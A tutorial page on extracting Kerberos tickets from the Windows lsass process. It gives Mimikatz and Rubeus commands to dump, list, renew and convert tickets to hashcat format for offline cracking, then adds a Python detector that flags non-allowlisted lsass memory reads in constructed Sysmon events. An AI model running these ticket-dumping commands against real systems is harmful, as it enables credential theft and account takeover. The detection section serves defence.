Harvesting tickets from Windows

Tickets in Windows are managed and stored by the lsass (Local Security Authority Subsystem Service) process, which is responsible for handling security policies. To extract these tickets, it is necessary to interact with the lsass process. A non-administrative user can only access their own tickets, while an administrator has the privilege to extract all tickets on the system. For such operations, the tools Mimikatz and Rubeus are widely used, each offering different commands and functionality.

Mimikatz

Mimikatz is a versatile tool that can interact with Windows security. It is used not only for extracting tickets but also for various other security-related operations.

```
# Extracting tickets using Mimikatz
sekurlsa::tickets /export
```

Rubeus

Rubeus is a tool built specifically for Kerberos interaction and manipulation. It is used for ticket extraction and handling, as well as other Kerberos-related activities.

```powershell
# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>
```

When using these commands, replace placeholders such as <BASE64_TICKET> and <luid> with the actual Base64-encoded ticket and the Logon ID, respectively. These tools provide extensive functionality for managing tickets and interacting with the security mechanisms of Windows.
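
Because extraction requires interacting with the lsass process, a defender can watch for that interaction. The following is an added example, not part of the original page: it filters Sysmon Event ID 10 (ProcessAccess) records for non-allowlisted processes that opened lsass.exe with memory-read rights. The sample events and the allowlist are constructed assumptions.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
LSASS = r"c:\windows\system32\lsass.exe"
PROCESS_VM_READ = 0x0010  # access right required to read another process's memory
# Assumption: software expected to read lsass here; tune per environment.
ALLOWED = {r"c:\program files\windows defender\msmpeng.exe"}

def _event(eid, src, tgt, access):
    """Build a constructed Sysmon-style event (not a real capture)."""
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{eid}</EventID></System>'
            f'<EventData><Data Name="SourceImage">{src}</Data>'
            f'<Data Name="TargetImage">{tgt}</Data>'
            f'<Data Name="GrantedAccess">{access}</Data></EventData></Event>')

SAMPLE_EVENTS = [  # constructed sample input
    _event(10, r"C:\Users\bob\Downloads\tool.exe", r"C:\Windows\System32\lsass.exe", "0x1010"),
    _event(10, r"C:\Program Files\Windows Defender\MsMpEng.exe",
           r"C:\Windows\System32\lsass.exe", "0x1410"),
    _event(10, r"C:\Windows\System32\taskmgr.exe", r"C:\Windows\System32\lsass.exe", "0x1000"),
    _event(10, r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "0x1fffff"),
]

def lsass_memory_reads(events_xml):
    """Return (source_image, granted_access) for non-allowlisted lsass memory reads."""
    hits = []
    for raw in events_xml:
        root = ET.fromstring(raw)
        if root.findtext("e:System/e:EventID", namespaces=NS) != "10":
            continue  # only ProcessAccess events are relevant
        data = {d.get("Name"): (d.text or "")
                for d in root.iterfind("e:EventData/e:Data", NS)}
        try:
            access = int(data.get("GrantedAccess", "0"), 16)
        except ValueError:
            continue  # malformed mask: skip rather than crash the pipeline
        if (data.get("TargetImage", "").lower() == LSASS
                and access & PROCESS_VM_READ
                and data.get("SourceImage", "").lower() not in ALLOWED):
            hits.append((data["SourceImage"], hex(access)))
    return hits

if __name__ == "__main__":
    for src, acc in lsass_memory_reads(SAMPLE_EVENTS):
        print(f"ALERT lsass memory read: {src} GrantedAccess={acc}")
```

This check covers only direct memory reads of lsass; ticket retrieval that goes through LSA APIs does not open the process this way and needs other telemetry.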